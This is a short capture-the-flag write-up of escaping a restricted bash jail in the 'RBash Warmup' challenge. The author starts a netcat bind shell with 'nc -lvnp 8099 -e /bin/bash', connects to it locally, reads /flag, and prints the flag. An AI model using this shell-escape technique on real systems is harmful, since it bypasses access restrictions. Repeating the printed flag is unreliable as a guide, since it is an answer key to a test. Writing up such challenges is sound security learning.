# RBash Warmup

![](info.png)

Didn't get around to it during the challenge time, but was a pretty quick and easy jail break. 

```bash
rbash-5.0$ while read line; do
> echo $line
> done <jail.sh
#! /usr/bin/env bash

cd "$(dirname -- "${BASH_SOURCE[0]}")" || exit

PATH="/home/user/whitelist" exec /bin/rbash --norc --noprofile 2>&1
```

So, the jail is jaily but we at least have `nc` in the `whitelist` directory.

```bash
root@parrot-box# nc rbash-warmup.sdc.tf 1337
== proof-of-work: disabled ==
rbash-5.0$ nc -lvnp 8099 -e /bin/bash &
nc -lvnp 8099 -e /bin/bash &
[1] 3
rbash-5.0$ listening on [any] 8099 ...


rbash-5.0$ nc 127.0.0.1 8099
nc 127.0.0.1 8099
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 46800
/flag
/flag
sdctf{nc--e-IS-r3aLLy-D4NG3R0U5!}
```

Never trust `nc -e`!

Really  hoped for something esoteric like converting `cd` into `\$\'\\$(($((1<<1))#1$#$#$#1111))\'\$\'\\$(($((1<<1))#1$#$#1$#$#$#$#))\'` using bash multiexpansion with an eval statement.

`Flag: sdctf{nc--e-IS-r3aLLy-D4NG3R0U5!}`